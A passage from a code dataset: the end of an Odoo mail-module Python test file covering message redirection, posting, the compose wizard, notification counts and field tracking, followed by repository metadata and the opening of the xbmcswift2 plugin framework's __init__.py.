'URL redirection: action without parameters should redirect to client action Inbox'
)
# Raoul has read access to Pigs -> should redirect to form view of Pigs
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_raoul_id, {'params': {'message_id': msg_id}})
self.assertEqual(
action.get('type'), 'ir.actions.act_window',
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
self.assertEqual(
action.get('res_id'), group_pigs.id,
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_raoul_id, {'params': {'model': 'mail.group', 'res_id': group_pigs.id}})
self.assertEqual(
action.get('type'), 'ir.actions.act_window',
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
self.assertEqual(
action.get('res_id'), group_pigs.id,
'URL redirection: action with message_id for read-accredited user should redirect to Pigs'
)
# Bert has no read access to Pigs -> should redirect to Inbox
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_bert_id, {'params': {'message_id': msg_id}})
self.assertEqual(
action.get('type'), 'ir.actions.client',
'URL redirection: action without parameters should redirect to client action Inbox'
)
self.assertEqual(
action.get('id'), act_id,
'URL redirection: action without parameters should redirect to client action Inbox'
)
action = mail_thread.message_redirect_action(self.mail_thread, cr, self.user_bert_id, {'params': {'model': 'mail.group', 'res_id': group_pigs.id}})
self.assertEqual(
action.get('type'), 'ir.actions.client',
'URL redirection: action without parameters should redirect to client action Inbox'
)
self.assertEqual(
action.get('id'), act_id,
'URL redirection: action without parameters should redirect to client action Inbox'
)
def test_20_message_post(self):
""" Tests designed for message_post. """
cr, uid, user_raoul, group_pigs = self.cr, self.uid, self.user_raoul, self.group_pigs
# --------------------------------------------------
# Data creation
# --------------------------------------------------
# 0 - Update existing users-partners
self.res_users.write(cr, uid, [uid], {'email': 'a@a', 'notify_email': 'always'})
self.res_users.write(cr, uid, [self.user_raoul_id], {'email': 'r@r'})
# 1 - Bert Tartopoils, with email, should receive emails for comments and emails
p_b_id = self.res_partner.create(cr, uid, {'name': 'Bert Tartopoils', 'email': 'b@b'})
# 2 - Carine Poilvache, with email, should receive emails for emails
p_c_id = self.res_partner.create(cr, uid, {'name': 'Carine Poilvache', 'email': 'c@c', 'notify_email': 'none'})
# 3 - Dédé Grosbedon, without email, to test email verification; should receive emails for every message
p_d_id = self.res_partner.create(cr, uid, {'name': 'Dédé Grosbedon', 'email': 'd@d', 'notify_email': 'always'})
# 4 - Attachments
attach1_id = self.ir_attachment.create(cr, user_raoul.id, {
'name': 'Attach1', 'datas_fname': 'Attach1',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
attach2_id = self.ir_attachment.create(cr, user_raoul.id, {
'name': 'Attach2', 'datas_fname': 'Attach2',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
attach3_id = self.ir_attachment.create(cr, user_raoul.id, {
'name': 'Attach3', 'datas_fname': 'Attach3',
'datas': 'bWlncmF0aW9uIHRlc3Q=',
'res_model': 'mail.compose.message', 'res_id': 0})
# 5 - Mail data
_subject = 'Pigs'
_mail_subject = 'Re: %s' % (group_pigs.name)
_body1 = '<p>Pigs rules</p>'
_body2 = '<html>Pigs rocks</html>'
_attachments = [
('List1', 'My first attachment'),
('List2', 'My second attachment')
]
# --------------------------------------------------
# CASE1: post comment + partners + attachments
# --------------------------------------------------
# Data: set alias_domain to see emails with alias
self.registry('ir.config_parameter').set_param(self.cr, self.uid, 'mail.catchall.domain', 'schlouby.fr')
# Data: change Pigs name to test reply_to
self.mail_group.write(cr, uid, [self.group_pigs_id], {'name': '"Pigs" !ù $%-'})
# Do: subscribe Raoul
new_follower_ids = [self.partner_raoul_id]
group_pigs.message_subscribe(new_follower_ids)
# Test: group followers = Raoul + uid
group_fids = [follower.id for follower in group_pigs.message_follower_ids]
test_fids = new_follower_ids + [self.partner_admin_id]
self.assertEqual(set(test_fids), set(group_fids),
'message_subscribe: incorrect followers after subscribe')
# Do: Raoul message_post on Pigs
self._init_mock_build_email()
msg1_id = self.mail_group.message_post(cr, user_raoul.id, self.group_pigs_id,
body=_body1, subject=_subject, partner_ids=[p_b_id, p_c_id],
attachment_ids=[attach1_id, attach2_id], attachments=_attachments,
type='comment', subtype='mt_comment')
msg = self.mail_message.browse(cr, uid, msg1_id)
msg_message_id = msg.message_id
msg_pids = [partner.id for partner in msg.notified_partner_ids]
msg_aids = [attach.id for attach in msg.attachment_ids]
sent_emails = self._build_email_kwargs_list
# Test: mail_message: subject and body not modified
self.assertEqual(_subject, msg.subject, 'message_post: mail.message subject incorrect')
self.assertEqual(_body1, msg.body, 'message_post: mail.message body incorrect')
# Test: mail_message: notified_partner_ids = group followers + partner_ids - author
test_pids = set([self.partner_admin_id, p_b_id, p_c_id])
self.assertEqual(test_pids, set(msg_pids), 'message_post: mail.message notified partners incorrect')
# Test: mail_message: attachments (4, attachment_ids + attachments)
test_aids = set([attach1_id, attach2_id])
msg_attach_names = set([attach.name for attach in msg.attachment_ids])
test_attach_names = set(['Attach1', 'Attach2', 'List1', 'List2'])
self.assertEqual(len(msg_aids), 4,
'message_post: mail.message wrong number of attachments')
self.assertEqual(msg_attach_names, test_attach_names,
'message_post: mail.message attachments incorrectly added')
self.assertTrue(test_aids.issubset(set(msg_aids)),
'message_post: mail.message attachments duplicated')
for attach in msg.attachment_ids:
self.assertEqual(attach.res_model, 'mail.group',
'message_post: mail.message attachments were not linked to the document')
self.assertEqual(attach.res_id, group_pigs.id,
'message_post: mail.message attachments were not linked to the document')
if 'List' in attach.name:
self.assertIn((attach.name, attach.datas.decode('base64')), _attachments,
'message_post: mail.message attachment name / data incorrect')
dl_attach = self.mail_message.download_attachment(cr, user_raoul.id, id_message=msg.id, attachment_id=attach.id)
self.assertIn((dl_attach['filename'], dl_attach['base64'].decode('base64')), _attachments,
'message_post: mail.message download_attachment is incorrect')
# Test: followers: same as before (author was already subscribed)
group_pigs.refresh()
group_fids = [follower.id for follower in group_pigs.message_follower_ids]
test_fids = new_follower_ids + [self.partner_admin_id]
self.assertEqual(set(test_fids), set(group_fids),
'message_post: wrong followers after posting')
# Test: mail_mail: notifications have been deleted
self.assertFalse(self.mail_mail.search(cr, uid, [('mail_message_id', '=', msg1_id)]),
'message_post: mail.mail notifications should have been auto-deleted!')
# Test: notifications emails: to a and b, c is email only, r is author
test_emailto = ['Administrator <a@a>', 'Bert Tartopoils <b@b>']
# test_emailto = ['"Followers of -Pigs-" <a@a>', '"Followers of -Pigs-" <b@b>']
self.assertEqual(len(sent_emails), 2,
'message_post: notification emails wrong number of send emails')
self.assertEqual(set([m['email_to'][0] for m in sent_emails]), set(test_emailto),
'message_post: notification emails wrong recipients (email_to)')
for sent_email in sent_emails:
self.assertEqual(sent_email['email_from'], 'Raoul Grosbedon <[email protected]>',
'message_post: notification email wrong email_from: should use alias of sender')
self.assertEqual(len(sent_email['email_to']), 1,
'message_post: notification email sent to more than one email address instead of a precise partner')
self.assertIn(sent_email['email_to'][0], test_emailto,
'message_post: notification email email_to incorrect')
self.assertEqual(sent_email['reply_to'], u'"YourCompany \\"Pigs\\" !ù $%-" <[email protected]>',
'message_post: notification email reply_to incorrect')
self.assertEqual(_subject, sent_email['subject'],
'message_post: notification email subject incorrect')
self.assertIn(_body1, sent_email['body'],
'message_post: notification email body incorrect')
self.assertIn('Pigs rules', sent_email['body_alternative'],
'message_post: notification email body alternative should contain the body')
self.assertNotIn('<p>', sent_email['body_alternative'],
'message_post: notification email body alternative still contains html')
self.assertFalse(sent_email['references'],
'message_post: references should be False when sending a message that is not a reply')
# Test: notification linked to this message = group followers = notified_partner_ids
notif_ids = self.mail_notification.search(cr, uid, [('message_id', '=', msg1_id)])
notif_pids = set([notif.partner_id.id for notif in self.mail_notification.browse(cr, uid, notif_ids)])
self.assertEqual(notif_pids, test_pids,
'message_post: mail.message created mail.notification incorrect')
# Data: Pigs name back to normal
self.mail_group.write(cr, uid, [self.group_pigs_id], {'name': 'Pigs'})
# --------------------------------------------------
# CASE2: reply + parent_id + parent notification
# --------------------------------------------------
# Data: remove alias_domain to see emails with alias
param_ids = self.registry('ir.config_parameter').search(cr, uid, [('key', '=', 'mail.catchall.domain')])
self.registry('ir.config_parameter').unlink(cr, uid, param_ids)
# Do: Raoul message_post on Pigs
self._init_mock_build_email()
msg2_id = self.mail_group.message_post(cr, user_raoul.id, self.group_pigs_id,
body=_body2, type='email', subtype='mt_comment',
partner_ids=[p_d_id], parent_id=msg1_id, attachment_ids=[attach3_id],
context={'mail_post_autofollow': True})
msg = self.mail_message.browse(cr, uid, msg2_id)
msg_pids = [partner.id for partner in msg.notified_partner_ids]
msg_aids = [attach.id for attach in msg.attachment_ids]
sent_emails = self._build_email_kwargs_list
# Test: mail_message: subject is False, body, parent_id is msg_id
self.assertEqual(msg.subject, False, 'message_post: mail.message subject incorrect')
self.assertEqual(msg.body, html_sanitize(_body2), 'message_post: mail.message body incorrect')
self.assertEqual(msg.parent_id.id, msg1_id, 'message_post: mail.message parent_id incorrect')
# Test: mail_message: notified_partner_ids = group followers
test_pids = [self.partner_admin_id, p_d_id]
self.assertEqual(set(test_pids), set(msg_pids), 'message_post: mail.message partners incorrect')
# Test: mail_message: notifications linked to this message = group followers = notified_partner_ids
notif_ids = self.mail_notification.search(cr, uid, [('message_id', '=', msg2_id)])
notif_pids = [notif.partner_id.id for notif in self.mail_notification.browse(cr, uid, notif_ids)]
self.assertEqual(set(test_pids), set(notif_pids), 'message_post: mail.message notification partners incorrect')
# Test: mail_mail: notifications deleted
self.assertFalse(self.mail_mail.search(cr, uid, [('mail_message_id', '=', msg2_id)]), 'mail.mail notifications should have been auto-deleted!')
# Test: emails send by server (to a, b, c, d)
test_emailto = [u'Administrator <a@a>', u'Bert Tartopoils <b@b>', u'Carine Poilvache <c@c>', u'D\xe9d\xe9 Grosbedon <d@d>']
# test_emailto = [u'"Followers of Pigs" <a@a>', u'"Followers of Pigs" <b@b>', u'"Followers of Pigs" <c@c>', u'"Followers of Pigs" <d@d>']
# self.assertEqual(len(sent_emails), 3, 'sent_email number of sent emails incorrect')
for sent_email in sent_emails:
self.assertEqual(sent_email['email_from'], 'Raoul Grosbedon <r@r>',
'message_post: notification email wrong email_from: should use email of sender when no alias domain set')
self.assertEqual(len(sent_email['email_to']), 1,
'message_post: notification email sent to more than one email address instead of a precise partner')
self.assertIn(sent_email['email_to'][0], test_emailto,
'message_post: notification email email_to incorrect')
self.assertEqual(email_split(sent_email['reply_to']), ['r@r'], # was '"Followers of Pigs" <r@r>', but makes no sense
'message_post: notification email reply_to incorrect: should have raoul email')
self.assertEqual(_mail_subject, sent_email['subject'],
'message_post: notification email subject incorrect')
self.assertIn(html_sanitize(_body2), sent_email['body'],
'message_post: notification email does not contain the body')
self.assertIn('Pigs rocks', sent_email['body_alternative'],
'message_post: notification email body alternative should contain the body')
self.assertNotIn('<p>', sent_email['body_alternative'],
'message_post: notification email body alternative still contains html')
self.assertIn(msg_message_id, sent_email['references'],
'message_post: notification email references lacks parent message message_id')
# Test: attachments + download
for attach in msg.attachment_ids:
self.assertEqual(attach.res_model, 'mail.group',
'message_post: mail.message attachment res_model incorrect')
self.assertEqual(attach.res_id, self.group_pigs_id,
'message_post: mail.message attachment res_id incorrect')
# Test: Dédé has been notified -> should also have been notified of the parent message
msg = self.mail_message.browse(cr, uid, msg1_id)
msg_pids = set([partner.id for partner in msg.notified_partner_ids])
test_pids = set([self.partner_admin_id, p_b_id, p_c_id, p_d_id])
self.assertEqual(test_pids, msg_pids, 'message_post: mail.message parent notification not created')
# Do: reply to last message
msg3_id = self.mail_group.message_post(cr, user_raoul.id, self.group_pigs_id, body='Test', parent_id=msg2_id)
msg = self.mail_message.browse(cr, uid, msg3_id)
# Test: check that its parent will be the first message
self.assertEqual(msg.parent_id.id, msg1_id, 'message_post did not flatten the thread structure')
def test_25_message_compose_wizard(self):
""" Tests designed for the mail.compose.message wizard. """
cr, uid, user_raoul, group_pigs = self.cr, self.uid, self.user_raoul, self.group_pigs
mail_compose = self.registry('mail.compose.message')
# --------------------------------------------------
# Data creation
# --------------------------------------------------
# 0 - Update existing users-partners
self.res_users.write(cr, uid, [uid], {'email': 'a@a'})
self.res_users.write(cr, uid, [self.user_raoul_id], {'email': 'r@r'})
# 1 - Bert Tartopoils, with email, should receive emails for comments and emails
p_b_id = self.res_partner.create(cr, uid, {'name': 'Bert Tartopoils', 'email': 'b@b'})
# 2 - Carine Poilvache, with email, should receive emails for emails
p_c_id = self.res_partner.create(cr, uid, {'name': 'Carine Poilvache', 'email': 'c@c', 'notify_email': 'always'})
# 3 - Dédé Grosbedon, without email, to test email verification; should receive emails for every message
p_d_id = self.res_partner.create(cr, uid, {'name': 'Dédé Grosbedon', 'email': 'd@d', 'notify_email': 'always'})
# 4 - Create a Bird mail.group, that will be used to test mass mailing
group_bird_id = self.mail_group.create(cr, uid,
{
'name': 'Bird',
'description': 'Bird resistance',
}, context={'mail_create_nolog': True})
group_bird = self.mail_group.browse(cr, uid, group_bird_id)
# 5 - Mail data
_subject = 'Pigs'
_body = 'Pigs <b>rule</b>'
_reply_subject = 'Re: %s' % _subject
_attachments = [
{'name': 'First', 'datas_fname': 'first.txt', 'datas': 'My first attachment'.encode('base64')},
{'name': 'Second', 'datas_fname': 'second.txt', 'datas': 'My second attachment'.encode('base64')}
]
_attachments_test = [('first.txt', 'My first attachment'), ('second.txt', 'My second attachment')]
# 6 - Subscribe Bert to Pigs
group_pigs.message_subscribe([p_b_id])
# --------------------------------------------------
# CASE1: wizard + partners + context keys
# --------------------------------------------------
# Do: Raoul wizard-composes on Pigs with auto-follow for partners, not for author
compose_id = mail_compose.create(cr, user_raoul.id,
{
'subject': _subject,
'body': _body,
'partner_ids': [(4, p_c_id), (4, p_d_id)],
}, context={
'default_composition_mode': 'comment',
'default_model': 'mail.group',
'default_res_id': self.group_pigs_id,
})
compose = mail_compose.browse(cr, uid, compose_id)
# Test: mail.compose.message: composition_mode, model, res_id
self.assertEqual(compose.composition_mode, 'comment', 'compose wizard: mail.compose.message incorrect composition_mode')
self.assertEqual(compose.model, 'mail.group', 'compose wizard: mail.compose.message incorrect model')
self.assertEqual(compose.res_id, self.group_pigs_id, 'compose wizard: mail.compose.message incorrect res_id')
# Do: Post the comment
mail_compose.send_mail(cr, user_raoul.id, [compose_id], {'mail_post_autofollow': True, 'mail_create_nosubscribe': True})
group_pigs.refresh()
message = group_pigs.message_ids[0]
# Test: mail.group: followers (c and d added by auto follow key; raoul not added by nosubscribe key)
pigs_pids = [p.id for p in group_pigs.message_follower_ids]
test_pids = [self.partner_admin_id, p_b_id, p_c_id, p_d_id]
self.assertEqual(set(pigs_pids), set(test_pids),
'compose wizard: mail_post_autofollow and mail_create_nosubscribe context keys not correctly taken into account')
# Test: mail.message: subject, body inside p
self.assertEqual(message.subject, _subject, 'compose wizard: mail.message incorrect subject')
self.assertEqual(message.body, '<p>%s</p>' % _body, 'compose wizard: mail.message incorrect body')
# Test: mail.message: notified_partner_ids = admin + bert (followers) + c + d (recipients)
msg_pids = [partner.id for partner in message.notified_partner_ids]
test_pids = [self.partner_admin_id, p_b_id, p_c_id, p_d_id]
self.assertEqual(set(msg_pids), set(test_pids),
'compose wizard: mail.message notified_partner_ids incorrect')
# --------------------------------------------------
# CASE2: reply + attachments
# --------------------------------------------------
# Do: Reply with attachments
compose_id = mail_compose.create(cr, user_raoul.id,
{
'attachment_ids': [(0, 0, _attachments[0]), (0, 0, _attachments[1])]
}, context={
'default_composition_mode': 'comment',
'default_res_id': self.group_pigs_id,
'default_parent_id': message.id
})
compose = mail_compose.browse(cr, uid, compose_id)
# Test: mail.compose.message: model, res_id, parent_id
self.assertEqual(compose.model, 'mail.group', 'compose wizard: mail.compose.message incorrect model')
self.assertEqual(compose.res_id, self.group_pigs_id, 'compose wizard: mail.compose.message incorrect res_id')
self.assertEqual(compose.parent_id.id, message.id, 'compose wizard: mail.compose.message incorrect parent_id')
# Test: mail.compose.message: subject as Re:.., body, parent_id
self.assertEqual(compose.subject, _reply_subject, 'compose wizard: mail.compose.message incorrect subject')
self.assertFalse(compose.body, 'compose wizard: mail.compose.message body should not contain parent message body')
self.assertEqual(compose.parent_id and compose.parent_id.id, message.id, 'compose wizard: mail.compose.message parent_id incorrect')
# Test: mail.compose.message: attachments
for attach in compose.attachment_ids:
self.assertIn((attach.datas_fname, attach.datas.decode('base64')), _attachments_test,
'compose wizard: mail.message attachment name / data incorrect')
# --------------------------------------------------
# CASE3: mass_mail on Pigs and Bird
# --------------------------------------------------
# Do: Compose in mass_mail_mode on pigs and bird
compose_id = mail_compose.create(
cr, user_raoul.id, {
'subject': _subject,
'body': '${object.description}',
'partner_ids': [(4, p_c_id), (4, p_d_id)],
}, context={
'default_composition_mode': 'mass_mail',
'default_model': 'mail.group',
'default_res_id': False,
'active_ids': [self.group_pigs_id, group_bird_id],
})
compose = mail_compose.browse(cr, uid, compose_id)
# Do: Post the comment, get created message for each group
mail_compose.send_mail(cr, user_raoul.id, [compose_id], context={
'default_res_id': -1,
'active_ids': [self.group_pigs_id, group_bird_id]
})
# check mail_mail
mail_mail_ids = self.mail_mail.search(cr, uid, [('subject', '=', _subject)])
for mail_mail in self.mail_mail.browse(cr, uid, mail_mail_ids):
self.assertEqual(set([p.id for p in mail_mail.recipient_ids]), set([p_c_id, p_d_id]),
'compose wizard: mail_mail mass mailing: mail.mail in mass mail incorrect recipients')
# check logged messages
group_pigs.refresh()
group_bird.refresh()
message1 = group_pigs.message_ids[0]
message2 = group_bird.message_ids[0]
# Test: Pigs and Bird did receive their message
test_msg_ids = self.mail_message.search(cr, uid, [], limit=2)
self.assertIn(message1.id, test_msg_ids, 'compose wizard: Pigs did not receive its mass mailing message')
self.assertIn(message2.id, test_msg_ids, 'compose wizard: Bird did not receive its mass mailing message')
# Test: mail.message: subject, body, subtype, notified partners (nobody + specific recipients)
self.assertEqual(message1.subject, _subject,
'compose wizard: message_post: mail.message in mass mail subject incorrect')
self.assertEqual(message1.body, '<p>%s</p>' % group_pigs.description,
'compose wizard: message_post: mail.message in mass mail body incorrect')
# self.assertEqual(set([p.id for p in message1.notified_partner_ids]), set([p_c_id, p_d_id]),
# 'compose wizard: message_post: mail.message in mass mail incorrect notified partners')
self.assertEqual(message2.subject, _subject,
'compose wizard: message_post: mail.message in mass mail subject incorrect')
self.assertEqual(message2.body, '<p>%s</p>' % group_bird.description,
'compose wizard: message_post: mail.message in mass mail body incorrect')
# self.assertEqual(set([p.id for p in message2.notified_partner_ids]), set([p_c_id, p_d_id]),
# 'compose wizard: message_post: mail.message in mass mail incorrect notified partners')
# Test: mail.group followers: author not added as follower in mass mail mode
pigs_pids = [p.id for p in group_pigs.message_follower_ids]
test_pids = [self.partner_admin_id, p_b_id, p_c_id, p_d_id]
self.assertEqual(set(pigs_pids), set(test_pids),
'compose wizard: mail_post_autofollow and mail_create_nosubscribe context keys not correctly taken into account')
bird_pids = [p.id for p in group_bird.message_follower_ids]
test_pids = [self.partner_admin_id]
self.assertEqual(set(bird_pids), set(test_pids),
'compose wizard: mail_post_autofollow and mail_create_nosubscribe context keys not correctly taken into account')
# Do: Compose in mass_mail, coming from list_view, we have an active_domain that should be supported
compose_id = mail_compose.create(cr, user_raoul.id,
{
'subject': _subject,
'body': '${object.description}',
'partner_ids': [(4, p_c_id), (4, p_d_id)],
}, context={
'default_composition_mode': 'mass_mail',
'default_model': 'mail.group',
'default_res_id': False,
'active_ids': [self.group_pigs_id],
'active_domain': [('name', 'in', ['Pigs', 'Bird'])],
})
compose = mail_compose.browse(cr, uid, compose_id)
# Do: Post the comment, get created message for each group
mail_compose.send_mail(
cr, user_raoul.id, [compose_id], context={
'default_res_id': -1,
'active_ids': [self.group_pigs_id, group_bird_id]
})
group_pigs.refresh()
group_bird.refresh()
message1 = group_pigs.message_ids[0]
message2 = group_bird.message_ids[0]
# Test: Pigs and Bird did receive their message
test_msg_ids = self.mail_message.search(cr, uid, [], limit=2)
self.assertIn(message1.id, test_msg_ids, 'compose wizard: Pigs did not receive its mass mailing message')
self.assertIn(message2.id, test_msg_ids, 'compose wizard: Bird did not receive its mass mailing message')
def test_30_needaction(self):
""" Tests for mail.message needaction. """
cr, uid, user_admin, user_raoul, group_pigs = self.cr, self.uid, self.user_admin, self.user_raoul, self.group_pigs
na_admin_base = self.mail_message._needaction_count(cr, uid, domain=[])
na_demo_base = self.mail_message._needaction_count(cr, user_raoul.id, domain=[])
# Test: number of unread notification = needaction on mail.message
notif_ids = self.mail_notification.search(cr, uid, [
('partner_id', '=', user_admin.partner_id.id),
('is_read', '=', False)
])
na_count = self.mail_message._needaction_count(cr, uid, domain=[])
self.assertEqual(len(notif_ids), na_count, 'unread notifications count does not match needaction count')
# Do: post 2 message on group_pigs as admin, 3 messages as demo user
for dummy in range(2):
group_pigs.message_post(body='My Body', subtype='mt_comment')
raoul_pigs = group_pigs.sudo(user_raoul)
for dummy in range(3):
raoul_pigs.message_post(body='My Demo Body', subtype='mt_comment')
# Test: admin has 3 new notifications (from demo), and 3 new needaction
notif_ids = self.mail_notification.search(cr, uid, [
('partner_id', '=', user_admin.partner_id.id),
('is_read', '=', False)
])
self.assertEqual(len(notif_ids), na_admin_base + 3, 'Admin should have 3 new unread notifications')
na_admin = self.mail_message._needaction_count(cr, uid, domain=[])
na_admin_group = self.mail_message._needaction_count(cr, uid, domain=[('model', '=', 'mail.group'), ('res_id', '=', self.group_pigs_id)])
self.assertEqual(na_admin, na_admin_base + 3, 'Admin should have 3 new needaction')
self.assertEqual(na_admin_group, 3, 'Admin should have 3 needaction related to Pigs')
# Test: demo has 0 new notifications (not a follower, not receiving its own messages), and 0 new needaction
notif_ids = self.mail_notification.search(cr, uid, [
('partner_id', '=', user_raoul.partner_id.id),
('is_read', '=', False)
])
self.assertEqual(len(notif_ids), na_demo_base + 0, 'Demo should have 0 new unread notifications')
na_demo = self.mail_message._needaction_count(cr, user_raoul.id, domain=[])
na_demo_group = self.mail_message._needaction_count(cr, user_raoul.id, domain=[('model', '=', 'mail.group'), ('res_id', '=', self.group_pigs_id)])
self.assertEqual(na_demo, na_demo_base + 0, 'Demo should have 0 new needaction')
self.assertEqual(na_demo_group, 0, 'Demo should have 0 needaction related to Pigs')
def test_40_track_field(self):
""" Testing auto tracking of fields. """
def _strip_string_spaces(body):
return body.replace(' ', '').replace('\n', '')
# Data: subscribe Raoul to Pigs, because he will change the public attribute and may lose access to the record
cr, uid = self.cr, self.uid
self.mail_group.message_subscribe_users(cr, uid, [self.group_pigs_id], [self.user_raoul_id])
# Data: res.users.group, to test group_public_id automatic logging
group_system_ref = self.registry('ir.model.data').get_object_reference(cr, uid, 'base', 'group_system')
group_system_id = group_system_ref and group_system_ref[1] or False
# Data: custom subtypes
mt_private_id = self.mail_message_subtype.create(cr, uid, {'name': 'private', 'description': 'Private public'})
self.ir_model_data.create(cr, uid, {'name': 'mt_private', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_private_id})
mt_name_supername_id = self.mail_message_subtype.create(cr, uid, {'name': 'name_supername', 'description': 'Supername name'})
self.ir_model_data.create(cr, uid, {'name': 'mt_name_supername', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_name_supername_id})
mt_group_public_set_id = self.mail_message_subtype.create(cr, uid, {'name': 'group_public_set', 'description': 'Group set'})
self.ir_model_data.create(cr, uid, {'name': 'mt_group_public_set', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_group_public_set_id})
mt_group_public_id = self.mail_message_subtype.create(cr, uid, {'name': 'group_public', 'description': 'Group changed'})
self.ir_model_data.create(cr, uid, {'name': 'mt_group_public', 'model': 'mail.message.subtype', 'module': 'mail', 'res_id': mt_group_public_id})
# Data: alter mail_group model for testing purposes (test on classic, selection and many2one fields)
cls = type(self.mail_group)
self.assertNotIn('_track', cls.__dict__)
cls._track = {
'public': {
'mail.mt_private': lambda self, cr, uid, obj, ctx=None: obj.public == 'private',
},
'name': {
'mail.mt_name_supername': lambda self, cr, uid, obj, ctx=None: obj.name == 'supername',
},
'group_public_id': {
'mail.mt_group_public_set': lambda self, cr, uid, obj, ctx=None: obj.group_public_id,
'mail.mt_group_public': lambda self, cr, uid, obj, ctx=None: True,
},
}
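# (Clarifying comment, added) each _track entry maps a tracked field to a dict of
# {subtype xml id: predicate}; when the field changes and the predicate returns a
# truthy value for the record, a message with that subtype is posted on it.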
visibility = {'public': 'onchange', 'name': 'always', 'group_public_id': 'onchange'}
for key in visibility:
self.assertFalse(hasattr(getattr(cls, key), 'track_visibility'))
getattr(cls, key).track_visibility = visibility[key]
@self.addCleanup
def cleanup():
delattr(cls, '_track')
for key in visibility:
del getattr(cls, key).track_visibility
# Test: change public -> tracked on change, not related to a subtype; name always tracked
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'public': 'public'})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 1, 'tracked: a message should have been produced')
# Test: first produced message: no subtype, name change tracked
last_msg = self.group_pigs.message_ids[-1]
self.assertFalse(last_msg.subtype_id, 'tracked: message should not have been linked to a subtype')
self.assertIn(u'SelectedGroupOnly\u2192Public', _strip_string_spaces(last_msg.body), 'tracked: message body incorrect')
self.assertIn('Pigs', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: change name as supername, public as private -> 2 subtypes
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'name': 'supername', 'public': 'private'})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 3, 'tracked: two messages should have been produced')
# Test: first produced message: mt_private
last_msg = self.group_pigs.message_ids[-2]
self.assertEqual(last_msg.subtype_id.id, mt_private_id, 'tracked: message should be linked to mt_private subtype')
self.assertIn('Private public', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Pigs\u2192supername', _strip_string_spaces(last_msg.body), 'tracked: message body incorrect')
# Test: second produced message: mt_name_supername
last_msg = self.group_pigs.message_ids[-3]
self.assertEqual(last_msg.subtype_id.id, mt_name_supername_id, 'tracked: message should be linked to mt_name_supername subtype')
self.assertIn('Supername name', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Public\u2192Private', _strip_string_spaces(last_msg.body), 'tracked: message body incorrect')
self.assertIn(u'Pigs\u2192supername', _strip_string_spaces(last_msg.body), 'tracked feature: message body does not hold always tracked field')
# Test: change public as public, group_public_id -> 2 subtypes, name always tracked
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'public': 'public', 'group_public_id': group_system_id})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 5, 'tracked: two messages should have been produced')
# Test: first produced message: mt_group_public_set_id, with name always tracked, public tracked on change
last_msg = self.group_pigs.message_ids[-4]
self.assertEqual(last_msg.subtype_id.id, mt_group_public_set_id, 'tracked: message should be linked to mt_group_public_set_id')
self.assertIn('Group set', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Private\u2192Public', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold changed tracked field')
self.assertIn(u'HumanResources/Employee\u2192Administration/Settings', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: second produced message: mt_group_public_id, with name always tracked, public tracked on change
last_msg = self.group_pigs.message_ids[-5]
self.assertEqual(last_msg.subtype_id.id, mt_group_public_id, 'tracked: message should be linked to mt_group_public_id')
self.assertIn('Group changed', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Private\u2192Public', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold changed tracked field')
self.assertIn(u'HumanResources/Employee\u2192Administration/Settings', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: change group_public_id to False -> 1 subtype, name always tracked
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'group_public_id': False})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 6, 'tracked: one message should have been produced')
# Test: produced message: mt_group_public, group_public_id reset tracked
last_msg = self.group_pigs.message_ids[-6]
self.assertEqual(last_msg.subtype_id.id, mt_group_public_id, 'tracked: message should be linked to mt_group_public_id')
self.assertIn('Group changed', last_msg.body, 'tracked: message body does not hold the subtype description')
self.assertIn(u'Administration/Settings\u2192', _strip_string_spaces(last_msg.body), 'tracked: message body does not hold always tracked field')
# Test: change not tracked field, no tracking message
self.mail_group.write(cr, self.user_raoul_id, [self.group_pigs_id], {'description': 'Dummy'})
self.group_pigs.refresh()
self.assertEqual(len(self.group_pigs.message_ids), 6, 'tracked: No message should have been produced')
|
agpl-3.0
|
jbaiter/plugin.video.brmediathek
|
resources/lib/xbmcswift2/__init__.py
|
2
|
2442
|
'''
xbmcswift2
----------
A micro framework to enable rapid development of XBMC plugins.
:copyright: (c) 2012 by Jonathan Beluch
:license: GPLv3, see LICENSE for more details.
'''
from types import ModuleType
class module(ModuleType):
'''A wrapper class for a module used to override __getattr__. This class
will behave normally for any existing module attributes. For any attributes
which do not exist in the wrapped module, a mock function will be
returned. This function will also return itself enabling multiple mock
function calls.
'''
def __init__(self, wrapped=None):
self.wrapped = wrapped
if wrapped:
self.__dict__.update(wrapped.__dict__)
def __getattr__(self, name):
'''Returns any existing attr for the wrapped module or returns a mock
function for anything else. Never raises an AttributeError.
'''
try:
return getattr(self.wrapped, name)
except AttributeError:
def func(*args, **kwargs):
'''A mock function which returns itself, enabling chainable
function calls.
'''
log.warning('The %s method has not been implemented on the CLI. '
'Your code might not work properly when calling '
'it.', name)
return self
return func
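# Illustrative note (not part of the original module): in CLI mode the wrapper
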